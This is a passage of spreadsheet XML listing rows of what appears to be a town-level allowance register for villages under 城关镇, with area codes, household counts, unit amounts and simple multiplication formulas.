      <c r="H243" s="24"/>
      <c r="I243" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J243" s="24"/>
      <c r="K243" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="244" customHeight="1" spans="1:11">
      <c r="A244" s="23" t="s">
        <v>828</v>
      </c>
      <c r="B244" s="24" t="str">
        <f>B243</f>
        <v>城关镇</v>
      </c>
      <c r="C244" s="24" t="str">
        <f>C243</f>
        <v>北外村</v>
      </c>
      <c r="D244" s="23" t="s">
        <v>829</v>
      </c>
      <c r="E244" s="23" t="s">
        <v>830</v>
      </c>
      <c r="F244" s="24" t="str">
        <f>F243</f>
        <v>4113210102</v>
      </c>
      <c r="G244" s="24"/>
      <c r="H244" s="24"/>
      <c r="I244" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J244" s="24"/>
      <c r="K244" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="245" customHeight="1" spans="1:11">
      <c r="A245" s="23" t="s">
        <v>831</v>
      </c>
      <c r="B245" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C245" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D245" s="24" t="s">
        <v>832</v>
      </c>
      <c r="E245" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F245" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G245" s="24">
        <v>2</v>
      </c>
      <c r="H245" s="25">
        <v>325</v>
      </c>
      <c r="I245" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J245" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K245" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="246" customHeight="1" spans="1:11">
      <c r="A246" s="23" t="s">
        <v>833</v>
      </c>
      <c r="B246" s="24" t="str">
        <f>B245</f>
        <v>城关镇</v>
      </c>
      <c r="C246" s="24" t="str">
        <f>C245</f>
        <v>中华村</v>
      </c>
      <c r="D246" s="23" t="s">
        <v>834</v>
      </c>
      <c r="E246" s="23" t="s">
        <v>497</v>
      </c>
      <c r="F246" s="24" t="str">
        <f>F245</f>
        <v>4113210108</v>
      </c>
      <c r="G246" s="24"/>
      <c r="H246" s="24"/>
      <c r="I246" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J246" s="24"/>
      <c r="K246" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="247" customHeight="1" spans="1:11">
      <c r="A247" s="23" t="s">
        <v>835</v>
      </c>
      <c r="B247" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C247" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D247" s="24" t="s">
        <v>836</v>
      </c>
      <c r="E247" s="24" t="s">
        <v>494</v>
      </c>
      <c r="F247" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G247" s="24">
        <v>1</v>
      </c>
      <c r="H247" s="25">
        <v>365</v>
      </c>
      <c r="I247" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J247" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K247" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="248" customHeight="1" spans="1:11">
      <c r="A248" s="23" t="s">
        <v>837</v>
      </c>
      <c r="B248" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C248" s="24" t="s">
        <v>637</v>
      </c>
      <c r="D248" s="24" t="s">
        <v>838</v>
      </c>
      <c r="E248" s="24" t="s">
        <v>839</v>
      </c>
      <c r="F248" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G248" s="24">
        <v>2</v>
      </c>
      <c r="H248" s="25">
        <v>325</v>
      </c>
      <c r="I248" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J248" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K248" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="249" customHeight="1" spans="1:11">
      <c r="A249" s="23" t="s">
        <v>840</v>
      </c>
      <c r="B249" s="24" t="str">
        <f>B248</f>
        <v>城关镇</v>
      </c>
      <c r="C249" s="24" t="str">
        <f>C248</f>
        <v>东北二组</v>
      </c>
      <c r="D249" s="23" t="s">
        <v>841</v>
      </c>
      <c r="E249" s="23" t="s">
        <v>842</v>
      </c>
      <c r="F249" s="24" t="str">
        <f>F248</f>
        <v>4113210103</v>
      </c>
      <c r="G249" s="24"/>
      <c r="H249" s="24"/>
      <c r="I249" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J249" s="24"/>
      <c r="K249" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="250" customHeight="1" spans="1:11">
      <c r="A250" s="23" t="s">
        <v>843</v>
      </c>
      <c r="B250" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C250" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D250" s="24" t="s">
        <v>844</v>
      </c>
      <c r="E250" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F250" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G250" s="24">
        <v>2</v>
      </c>
      <c r="H250" s="25">
        <v>325</v>
      </c>
      <c r="I250" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J250" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K250" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="251" customHeight="1" spans="1:11">
      <c r="A251" s="23" t="s">
        <v>845</v>
      </c>
      <c r="B251" s="24" t="str">
        <f>B250</f>
        <v>城关镇</v>
      </c>
      <c r="C251" s="24" t="str">
        <f>C250</f>
        <v>东北六组</v>
      </c>
      <c r="D251" s="23" t="s">
        <v>846</v>
      </c>
      <c r="E251" s="23" t="s">
        <v>306</v>
      </c>
      <c r="F251" s="24" t="str">
        <f>F250</f>
        <v>4113210103</v>
      </c>
      <c r="G251" s="24"/>
      <c r="H251" s="24"/>
      <c r="I251" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J251" s="24"/>
      <c r="K251" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="252" customHeight="1" spans="1:11">
      <c r="A252" s="23" t="s">
        <v>847</v>
      </c>
      <c r="B252" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C252" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D252" s="24" t="s">
        <v>848</v>
      </c>
      <c r="E252" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F252" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G252" s="24">
        <v>1</v>
      </c>
      <c r="H252" s="25">
        <v>365</v>
      </c>
      <c r="I252" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J252" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K252" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="253" customHeight="1" spans="1:11">
      <c r="A253" s="23" t="s">
        <v>849</v>
      </c>
      <c r="B253" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C253" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D253" s="24" t="s">
        <v>850</v>
      </c>
      <c r="E253" s="24" t="s">
        <v>453</v>
      </c>
      <c r="F253" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G253" s="24">
        <v>1</v>
      </c>
      <c r="H253" s="25">
        <v>365</v>
      </c>
      <c r="I253" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J253" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K253" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="254" customHeight="1" spans="1:11">
      <c r="A254" s="23" t="s">
        <v>851</v>
      </c>
      <c r="B254" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C254" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D254" s="24" t="s">
        <v>852</v>
      </c>
      <c r="E254" s="24" t="s">
        <v>853</v>
      </c>
      <c r="F254" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G254" s="24">
        <v>2</v>
      </c>
      <c r="H254" s="25">
        <v>325</v>
      </c>
      <c r="I254" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J254" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K254" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="255" customHeight="1" spans="1:11">
      <c r="A255" s="23" t="s">
        <v>854</v>
      </c>
      <c r="B255" s="24" t="str">
        <f>B254</f>
        <v>城关镇</v>
      </c>
      <c r="C255" s="24" t="str">
        <f>C254</f>
        <v>中华村</v>
      </c>
      <c r="D255" s="23" t="s">
        <v>855</v>
      </c>
      <c r="E255" s="23" t="s">
        <v>269</v>
      </c>
      <c r="F255" s="24" t="str">
        <f>F254</f>
        <v>4113210108</v>
      </c>
      <c r="G255" s="24"/>
      <c r="H255" s="24"/>
      <c r="I255" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J255" s="24"/>
      <c r="K255" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="256" customHeight="1" spans="1:11">
      <c r="A256" s="23" t="s">
        <v>856</v>
      </c>
      <c r="B256" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C256" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D256" s="24" t="s">
        <v>857</v>
      </c>
      <c r="E256" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F256" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G256" s="24">
        <v>1</v>
      </c>
      <c r="H256" s="25">
        <v>365</v>
      </c>
      <c r="I256" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J256" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K256" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="257" customHeight="1" spans="1:11">
      <c r="A257" s="23" t="s">
        <v>858</v>
      </c>
      <c r="B257" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C257" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D257" s="24" t="s">
        <v>859</v>
      </c>
      <c r="E257" s="24" t="s">
        <v>360</v>
      </c>
      <c r="F257" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G257" s="24">
        <v>1</v>
      </c>
      <c r="H257" s="25">
        <v>365</v>
      </c>
      <c r="I257" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J257" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K257" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="258" customHeight="1" spans="1:11">
      <c r="A258" s="23" t="s">
        <v>860</v>
      </c>
      <c r="B258" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C258" s="24" t="s">
        <v>861</v>
      </c>
      <c r="D258" s="24" t="s">
        <v>862</v>
      </c>
      <c r="E258" s="24" t="s">
        <v>863</v>
      </c>
      <c r="F258" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G258" s="24">
        <v>1</v>
      </c>
      <c r="H258" s="24">
        <v>400</v>
      </c>
      <c r="I258" s="24">
        <f t="shared" si="3"/>
        <v>400</v>
      </c>
      <c r="J258" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K258" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="259" customHeight="1" spans="1:11">
      <c r="A259" s="23" t="s">
        <v>864</v>
      </c>
      <c r="B259" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C259" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D259" s="24" t="s">
        <v>865</v>
      </c>
      <c r="E259" s="24" t="s">
        <v>866</v>
      </c>
      <c r="F259" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G259" s="24">
        <v>1</v>
      </c>
      <c r="H259" s="25">
        <v>365</v>
      </c>
      <c r="I259" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J259" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K259" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="260" customHeight="1" spans="1:11">
      <c r="A260" s="23" t="s">
        <v>867</v>
      </c>
      <c r="B260" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C260" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D260" s="24" t="s">
        <v>868</v>
      </c>
      <c r="E260" s="24" t="s">
        <v>869</v>
      </c>
      <c r="F260" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G260" s="24">
        <v>1</v>
      </c>
      <c r="H260" s="25">
        <v>365</v>
      </c>
      <c r="I260" s="24">
        <f t="shared" ref="I260:I323" si="4">H260*G260</f>
        <v>365</v>
      </c>
      <c r="J260" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K260" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="261" customHeight="1" spans="1:11">
      <c r="A261" s="23" t="s">
        <v>870</v>
      </c>
      <c r="B261" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C261" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D261" s="24" t="s">
        <v>819</v>
      </c>
      <c r="E261" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F261" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G261" s="24">
        <v>1</v>
      </c>
      <c r="H261" s="25">
        <v>365</v>
      </c>
      <c r="I261" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J261" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K261" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="262" customHeight="1" spans="1:11">
      <c r="A262" s="23" t="s">
        <v>871</v>
      </c>
      <c r="B262" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C262" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D262" s="24" t="s">
        <v>872</v>
      </c>
      <c r="E262" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F262" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G262" s="24">
        <v>2</v>
      </c>
      <c r="H262" s="25">
        <v>325</v>
      </c>
      <c r="I262" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J262" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K262" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="263" customHeight="1" spans="1:11">
      <c r="A263" s="23" t="s">
        <v>873</v>
      </c>
      <c r="B263" s="24" t="str">
        <f>B262</f>
        <v>城关镇</v>
      </c>
      <c r="C263" s="24" t="str">
        <f>C262</f>
        <v>中华村</v>
      </c>
      <c r="D263" s="23" t="s">
        <v>874</v>
      </c>
      <c r="E263" s="23" t="s">
        <v>239</v>
      </c>
      <c r="F263" s="24" t="str">
        <f>F262</f>
        <v>4113210108</v>
      </c>
      <c r="G263" s="24"/>
      <c r="H263" s="24"/>
      <c r="I263" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J263" s="24"/>
      <c r="K263" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="264" customHeight="1" spans="1:11">
      <c r="A264" s="23" t="s">
        <v>875</v>
      </c>
      <c r="B264" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C264" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D264" s="24" t="s">
        <v>876</v>
      </c>
      <c r="E264" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F264" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G264" s="24">
        <v>1</v>
      </c>
      <c r="H264" s="25">
        <v>365</v>
      </c>
      <c r="I264" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J264" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K264" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="265" customHeight="1" spans="1:11">
      <c r="A265" s="23" t="s">
        <v>877</v>
      </c>
      <c r="B265" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C265" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D265" s="24" t="s">
        <v>878</v>
      </c>
      <c r="E265" s="24" t="s">
        <v>879</v>
      </c>
      <c r="F265" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G265" s="24">
        <v>1</v>
      </c>
      <c r="H265" s="25">
        <v>365</v>
      </c>
      <c r="I265" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J265" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K265" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="266" customHeight="1" spans="1:11">
      <c r="A266" s="23" t="s">
        <v>880</v>
      </c>
      <c r="B266" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C266" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D266" s="24" t="s">
        <v>881</v>
      </c>
      <c r="E266" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F266" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G266" s="24">
        <v>2</v>
      </c>
      <c r="H266" s="25">
        <v>325</v>
      </c>
      <c r="I266" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J266" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K266" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="267" customHeight="1" spans="1:11">
      <c r="A267" s="23" t="s">
        <v>882</v>
      </c>
      <c r="B267" s="24" t="str">
        <f>B266</f>
        <v>城关镇</v>
      </c>
      <c r="C267" s="24" t="str">
        <f>C266</f>
        <v>中华村</v>
      </c>
      <c r="D267" s="23" t="s">
        <v>883</v>
      </c>
      <c r="E267" s="23" t="s">
        <v>402</v>
      </c>
      <c r="F267" s="24" t="str">
        <f>F266</f>
        <v>4113210108</v>
      </c>
      <c r="G267" s="24"/>
      <c r="H267" s="24"/>
      <c r="I267" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J267" s="24"/>
      <c r="K267" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="268" customHeight="1" spans="1:11">
      <c r="A268" s="23" t="s">
        <v>884</v>
      </c>
      <c r="B268" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C268" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D268" s="24" t="s">
        <v>885</v>
      </c>
      <c r="E268" s="24" t="s">
        <v>524</v>
      </c>
      <c r="F268" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G268" s="24">
        <v>1</v>
      </c>
      <c r="H268" s="25">
        <v>365</v>
      </c>
      <c r="I268" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J268" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K268" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="269" customHeight="1" spans="1:11">
      <c r="A269" s="23" t="s">
        <v>886</v>
      </c>
      <c r="B269" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C269" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D269" s="24" t="s">
        <v>887</v>
      </c>
      <c r="E269" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F269" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G269" s="24">
        <v>1</v>
      </c>
      <c r="H269" s="25">
        <v>365</v>
      </c>
      <c r="I269" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J269" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K269" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="270" customHeight="1" spans="1:11">
      <c r="A270" s="23" t="s">
        <v>888</v>
      </c>
      <c r="B270" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C270" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D270" s="24" t="s">
        <v>889</v>
      </c>
      <c r="E270" s="24" t="s">
        <v>432</v>
      </c>
      <c r="F270" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G270" s="24">
        <v>1</v>
      </c>
      <c r="H270" s="25">
        <v>365</v>
      </c>
      <c r="I270" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J270" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K270" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="271" customHeight="1" spans="1:11">
      <c r="A271" s="23" t="s">
        <v>890</v>
      </c>
      <c r="B271" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C271" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D271" s="24" t="s">
        <v>891</v>
      </c>
      <c r="E271" s="24" t="s">
        <v>669</v>
      </c>
      <c r="F271" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G271" s="24">
        <v>1</v>
      </c>
      <c r="H271" s="25">
        <v>365</v>
      </c>
      <c r="I271" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J271" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K271" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="272" customHeight="1" spans="1:11">
      <c r="A272" s="23" t="s">
        <v>892</v>
      </c>
      <c r="B272" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C272" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D272" s="24" t="s">
        <v>893</v>
      </c>
      <c r="E272" s="24" t="s">
        <v>519</v>
      </c>
      <c r="F272" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G272" s="24">
        <v>1</v>
      </c>
      <c r="H272" s="25">
        <v>365</v>
      </c>
      <c r="I272" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J272" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K272" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="273" customHeight="1" spans="1:11">
      <c r="A273" s="23" t="s">
        <v>894</v>
      </c>
      <c r="B273" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C273" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D273" s="24" t="s">
        <v>895</v>
      </c>
      <c r="E273" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F273" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G273" s="24">
        <v>2</v>
      </c>
      <c r="H273" s="25">
        <v>325</v>
      </c>
      <c r="I273" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J273" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K273" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="274" customHeight="1" spans="1:11">
      <c r="A274" s="23" t="s">
        <v>896</v>
      </c>
      <c r="B274" s="24" t="str">
        <f>B273</f>
        <v>城关镇</v>
      </c>
      <c r="C274" s="24" t="str">
        <f>C273</f>
        <v>西北村</v>
      </c>
      <c r="D274" s="23" t="s">
        <v>897</v>
      </c>
      <c r="E274" s="23" t="s">
        <v>239</v>
      </c>
      <c r="F274" s="24" t="str">
        <f>F273</f>
        <v>4113210106</v>
      </c>
      <c r="G274" s="24"/>
      <c r="H274" s="24"/>
      <c r="I274" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J274" s="24"/>
      <c r="K274" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="275" customHeight="1" spans="1:11">
      <c r="A275" s="23" t="s">
        <v>898</v>
      </c>
      <c r="B275" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C275" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D275" s="24" t="s">
        <v>899</v>
      </c>
      <c r="E275" s="24" t="s">
        <v>232</v>
      </c>
      <c r="F275" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G275" s="24">
        <v>2</v>
      </c>
      <c r="H275" s="25">
        <v>325</v>
      </c>
      <c r="I275" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J275" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K275" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="276" customHeight="1" spans="1:11">
      <c r="A276" s="23" t="s">
        <v>900</v>
      </c>
      <c r="B276" s="24" t="str">
        <f>B275</f>
        <v>城关镇</v>
      </c>
      <c r="C276" s="24" t="str">
        <f>C275</f>
        <v>北外村</v>
      </c>
      <c r="D276" s="23" t="s">
        <v>901</v>
      </c>
      <c r="E276" s="23" t="s">
        <v>902</v>
      </c>
      <c r="F276" s="24" t="str">
        <f>F275</f>
        <v>4113210102</v>
      </c>
      <c r="G276" s="24"/>
      <c r="H276" s="24"/>
      <c r="I276" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J276" s="24"/>
      <c r="K276" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="277" customHeight="1" spans="1:11">
      <c r="A277" s="23" t="s">
        <v>903</v>
      </c>
      <c r="B277" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C277" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D277" s="24" t="s">
        <v>904</v>
      </c>
      <c r="E277" s="24" t="s">
        <v>866</v>
      </c>
      <c r="F277" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G277" s="24">
        <v>1</v>
      </c>
      <c r="H277" s="25">
        <v>365</v>
      </c>
      <c r="I277" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J277" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K277" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="278" customHeight="1" spans="1:11">
      <c r="A278" s="23" t="s">
        <v>905</v>
      </c>
      <c r="B278" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C278" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D278" s="24" t="s">
        <v>906</v>
      </c>
      <c r="E278" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F278" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G278" s="24">
        <v>1</v>
      </c>
      <c r="H278" s="25">
        <v>365</v>
      </c>
      <c r="I278" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J278" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K278" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="279" customHeight="1" spans="1:11">
      <c r="A279" s="23" t="s">
        <v>907</v>
      </c>
      <c r="B279" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C279" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D279" s="24" t="s">
        <v>908</v>
      </c>
      <c r="E279" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F279" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G279" s="24">
        <v>1</v>
      </c>
      <c r="H279" s="25">
        <v>365</v>
      </c>
      <c r="I279" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J279" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K279" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="280" customHeight="1" spans="1:11">
      <c r="A280" s="23" t="s">
        <v>909</v>
      </c>
      <c r="B280" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C280" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D280" s="24" t="s">
        <v>910</v>
      </c>
      <c r="E280" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F280" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G280" s="24">
        <v>1</v>
      </c>
      <c r="H280" s="25">
        <v>365</v>
      </c>
      <c r="I280" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J280" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K280" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="281" customHeight="1" spans="1:11">
      <c r="A281" s="23" t="s">
        <v>911</v>
      </c>
      <c r="B281" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C281" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D281" s="24" t="s">
        <v>912</v>
      </c>
      <c r="E281" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F281" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G281" s="24">
        <v>1</v>
      </c>
      <c r="H281" s="25">
        <v>365</v>
      </c>
      <c r="I281" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J281" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K281" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="282" customHeight="1" spans="1:11">
      <c r="A282" s="23" t="s">
        <v>913</v>
      </c>
      <c r="B282" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C282" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D282" s="24" t="s">
        <v>914</v>
      </c>
      <c r="E282" s="24" t="s">
        <v>915</v>
      </c>
      <c r="F282" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G282" s="24">
        <v>1</v>
      </c>
      <c r="H282" s="25">
        <v>365</v>
      </c>
      <c r="I282" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J282" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K282" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="283" customHeight="1" spans="1:11">
      <c r="A283" s="23" t="s">
        <v>916</v>
      </c>
      <c r="B283" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C283" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D283" s="24" t="s">
        <v>917</v>
      </c>
      <c r="E283" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F283" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G283" s="24">
        <v>1</v>
      </c>
      <c r="H283" s="25">
        <v>365</v>
      </c>
      <c r="I283" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J283" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K283" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="284" customHeight="1" spans="1:11">
      <c r="A284" s="23" t="s">
        <v>918</v>
      </c>
